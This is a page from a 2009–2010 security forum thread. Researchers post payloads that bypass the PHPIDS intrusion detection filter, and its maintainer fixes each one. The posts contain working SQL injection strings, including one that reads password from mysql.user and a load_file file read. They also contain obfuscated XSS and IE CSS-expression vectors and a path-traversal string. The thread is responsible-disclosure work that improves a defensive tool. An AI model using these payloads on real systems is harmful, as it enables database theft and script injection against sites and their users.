Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...2122232425262728293031Next
Current Page: 28 of 31
;
Posted by: Anonymous User
Date: September 07, 2009 02:50PM

b



Edited 1 time(s). Last edit at 10/16/2009 02:09AM by philip_clarke.

Options: ReplyQuote
Re: phpids bypass using mootools
Posted by: Anonymous User
Date: September 07, 2009 06:23PM

Confirmed and fixed - will be mentioned in the next release note (if you don't mind). Thanks!

https://trac.php-ids.org/index.fcgi/changeset/1327

Options: ReplyQuote
Re: PHPIDS (0.6.1 "Thriller")
Posted by: barbarianbob
Date: September 08, 2009 08:50AM

@thrill thanks



Edited 1 time(s). Last edit at 09/08/2009 10:23AM by barbarianbob.

Options: ReplyQuote
Re: PHPIDS (0.6.1 "Thriller")
Posted by: thrill
Date: September 08, 2009 10:13AM

@phillip

Today I only deleted your posts. I will no longer tolerate your abusive personality. If you continue attempting to insult other members of this board, I will ban you. Consider this your final warning.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: PHPIDS (0.6.1 "Thriller")
Posted by: Anonymous User
Date: September 08, 2009 11:29AM

Am I the only one here feeling the need to grow out of our diapers and behave like grown ups again?



Edited 1 time(s). Last edit at 09/08/2009 02:19PM by .mario.

Options: ReplyQuote
f
Posted by: Anonymous User
Date: September 08, 2009 04:54PM

s



Edited 1 time(s). Last edit at 10/16/2009 02:07AM by philip_clarke.

Options: ReplyQuote
Re: PHPIDS (0.6.1 "Thriller") ... thriller indeed huh?
Posted by: thornmaker
Date: September 11, 2009 01:23PM

I read this morning that mod security will be adding the php-ids filters into the core rule set: https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/2009-September/000091.html

i hope they understand it's php-ids, not php-ips

Options: ReplyQuote
Re: PHPIDS (0.6.1 "Thriller") ... thriller indeed huh?
Posted by: Anonymous User
Date: September 11, 2009 02:36PM

Yep - I know. The biggest problem is the lack of the Converter. Am currently mailing with Ryan about this.

Options: ReplyQuote
Re: PHPIDS (0.6.1 "Thriller") ... thriller indeed huh?
Posted by: lightos
Date: September 18, 2009 03:29PM

sql inj' and 0 < ' 1x00 -true
sql inj' and 1 < ' 1x00 -false

Options: ReplyQuote
Re: PHPIDS 0.6.2 - the release without a name
Posted by: Reiners
Date: October 03, 2009 07:27PM

hi .mario!

I just installed PHPIDS on our internship hacking platform and checked some challenges. PHPIDS doesnt sees the following as an attack:

dir/..././..././folder/file.php

In my opinion it should get detected since its a common attack against a simple "../" filter. On the other hand its not your job to detect attacks against stupid filters ;) just wanted to let you know.

I'm looking forward to your talk =)

Options: ReplyQuote
Re: PHPIDS 0.6.2 - the release without a name
Posted by: Anonymous User
Date: October 04, 2009 07:42AM

All fixed in .1345 - thx!

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: March 16, 2010 07:33AM

(1)or(1)=(1)

(case-1 when mid(load_file(0x61616161),12, 1/ 1)like 0x61 then 1 else 0 end)
// returns "1" if the 12th character of the file "aaaa" is "a", otherwise "0"

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: lightos
Date: March 18, 2010 02:50AM

http://demo.php-ids.org/?test=-1%27%A0union%A0SELECT@,password%20from%20mysql.user%20where%20true%20rlike%20%271



Edited 1 time(s). Last edit at 03/18/2010 02:52AM by lightos.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: March 18, 2010 06:21AM

nice find!

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: March 18, 2010 07:22AM

Indeed - will be fixed this weekend - thx :)

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: March 18, 2010 09:41AM

btw %A0 is the only non-standard ascii character which is allowed as seperator. (more here)

here a stupid one if you know the column name in a where clause (independet of data type):

0'+column#

Same as 1' or 1=1# But hard to filter I think.



Edited 2 time(s). Last edit at 03/18/2010 10:48AM by Reiners.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: March 19, 2010 06:28AM

@lightos

Very nice! :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 16, 2010 09:24AM

FF & IE

+Harmless HTML is allowed.

<img src="." =">" onerror=alert(1);//

Nothing suspicious was found!

----------------------
~Veritas~

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 16, 2010 11:24AM

Nice! That was a hard one to fix - and I am not sure if it's bulletproof now. The problem was caused by a faulty length comparison between the sanitized and the untreated string resulting in a check against a single character string.

My first solution is a regular expression to check for attribute text flowing out of the tag after the HTMLPurifier treatment and blurring the results. I am sure this fix needs several more iterations to work in 99.99% of all situations but it seems okay for now.

https://trac.php-ids.org/index.fcgi/changeset/1375

Thanks!

[EDIT]Okay - the fix sucks balls - second one coming in



Edited 1 time(s). Last edit at 04/16/2010 11:40AM by .mario.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 16, 2010 12:19PM

Okay - another patch is coming - I had problems with injections like this after the first one:

<img src="." =">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa onerror = alert(1)/&#10;/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

It's still a bit ugly what I did but sufficient for today's evening :)

Thx again...


Btw - it doesn't make people's life easier that crap like this works - but it's useful to know haha:
<img src= # onerror = alert(1) <b>foo</b>



Edited 1 time(s). Last edit at 04/16/2010 12:26PM by .mario.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 17, 2010 04:20PM

All browsers except IE.

alal=(/YWxlcnQ/)(/YWxlcnQ/),
alal=alal[0],
atyujg=(/atob/)(/atob/),
con=atyujg.concat,
con1=con()[0],
con=con1[atyujg],
alal=con(alal),
alal=con1[alal],
alal(1)

<problem>(/blabla/)(/blabla/)</problem>

----------------------
~Veritas~

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 18, 2010 06:35AM

IE only

* Harmless HTML is allowed
* Nothing suspicious was found!

<a style="background:url(http://hh*/)}lo:expression(this.lol?0:alert(this.lol=1))/*%31);">lo</a>

LeverOne

----------------------
~Veritas~

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 18, 2010 06:39AM

Nice one - one more special character and the centrifuge would have got it :) Fixed in .1377!

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 18, 2010 07:56AM

@LeverOne Haha - that vector rocks for so many reasons :) Fixed for now...

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 18, 2010 11:20AM

gut :)

more IE
<a style="background:url(/hyyuj)&#125lo:expression&#40alert&#40/1/&#41//)/*lo);">lo</a>

LeverOne

----------------------
~Veritas~

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 18, 2010 02:36PM

Danke :) I just committed a new version of the internal _diff() method - fixing a lot of other bugs too. It should be way faster since I got rid of a lot of legacy overhead. There were some substantial problems your vectors pointed out nd I am relatively sure to have most of the fixed.

I'm ready for the next round :)

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 18, 2010 04:21PM

A'm ready too :)

IE
<a style="background:url(http://lo/\\)}lo:expression\000028alert\000028/1/\000029\000029/*lo);">lo</a>

LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/18/2010 04:26PM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 18, 2010 05:07PM

Nice find! I removed the extra urldecode() - now it makes a bit more sense what's happeing in the _diff() method :D Thx!

https://trac.php-ids.org/index.fcgi/changeset/1384

Btw - I am wondering if AmbushCommander is still reading this thread - that vector and most of the ones before are just one tiny step way from breaking the HTMLPurifier:

In: <a style="background:url(//lo/)}lo:expression\(alert(1)));">lo</a>

Out: <a style="background:url(//lo/)%7Dlo:expression\(alert(1)));">lo</a>

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 19, 2010 10:35AM

PHPIDS ( HTMLPurifier )

IE 6

<a href="http://ha.ckers.org/xss.css" style="background:url(/**/javascript:document.documentElement.firstChild.lastChild.href=document.documentElement.firstChild.nextSibling.lastChild.previousSibling.previousSibling.lastChild.previousSibling.previousSibling.lastChild.lastChild.lastChild.lastChild.lastChild.href);">lo</a>

LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/19/2010 10:50AM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 19, 2010 03:33PM

All browsers except IE.
alal=(1,/YWxlcnQ/), 
alal=alal(alal),
alal=alal[0],
atyujg=(1,/atob/),
atyujg=atyujg(atyujg),
atat=atyujg[0],
con=atyujg.concat,
con1=con(),
con1=con1[0],
con=con1[atat],
alal=con(alal),
alal=con1[alal],
alal(1)

<problem>alal=(1,/blabla/)</problem>

----------------------
~Veritas~

Options: ReplyQuote
Pages: PreviousFirst...2122232425262728293031Next
Current Page: 28 of 31


Sorry, only registered users may post in this forum.